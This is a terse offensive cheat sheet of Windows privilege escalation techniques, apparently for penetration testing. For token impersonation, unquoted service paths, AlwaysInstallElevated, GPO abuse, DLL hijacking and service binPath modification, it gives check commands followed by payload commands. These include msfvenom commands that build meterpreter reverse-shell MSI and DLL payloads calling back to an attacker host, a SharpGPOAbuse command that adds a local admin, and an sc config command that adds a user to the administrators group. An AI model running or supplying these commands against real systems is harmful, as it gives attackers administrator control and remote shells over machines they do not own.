Windows Privilege Escalation Methods

SeImpersonatePrivilege

Allows for token impersonation. Can be abused to escalate privileges when this policy is enabled.

Check:

whoami /priv

Payload / Execution:

• Juicy Potato / Lovely Potato
• PrintSpoofer.exe

Unquoted Service Path

When a service name is not within quotations, Windows will check each "stop" along the path where the spaces occur.

Check:

Using PowerUp:

Invoke-AllChecks

If service names known:

sc qc servicename

Payload / Execution:

For a service at:

C:\Program Files\New Service\service.exe

Using PowerUp:

Write-ServiceBinary -ServiceName 'New Service' -Path <HijackPath>

OR manually place payload at:
C:\Program.exe
OR
C:\Program Files\new.exe

Then, restart the service to execute the payload:

sc restart "New Service"

AlwaysInstallElevated - Registry Escalation

Check:

reg query HKLM\Software\Policies\Microsoft\Windows\Installer

Payload / Execution:

msfvenom -p windows/meterpreter/reverse_tcp lhost=tun0 -f msi -o exp.msi

GPO Abuse

Check:

Using PowerView:

Get-NetGPO

Payload / Execution:

./SharpGPOAbuse.exe --AddLocalAdmin --UserAccount Administrator --GPOName "Default Domain Policy"

DLL Hijacking

Check:

Using PowerUp:

Invoke-AllChecks

Payload / Execution:

With PowerUp:

Write-HijackDll -DllPath 'C:\Program Files\program\func.dll'

Manually generate DLL:

# 32-bit
msfvenom -p windows/meterpreter/reverse_tcp -ax86 -f dll LHOST=tun0 LPORT=443 > exp.dll

# 64-bit
msfvenom -p windows/x64/meterpreter/reverse_tcp -ax64 -f dll LHOST=tun0 LPORT=443 > exp.dll

binPath Modification

Check:

accesschk64.exe -wuvc daclsvc

Confirmation: Look for SERVICE_CHANGE_CONFIG

Payload / Execution:

sc config daclsvc binpath= "net localgroup administrators user /add"
sc start daclsvc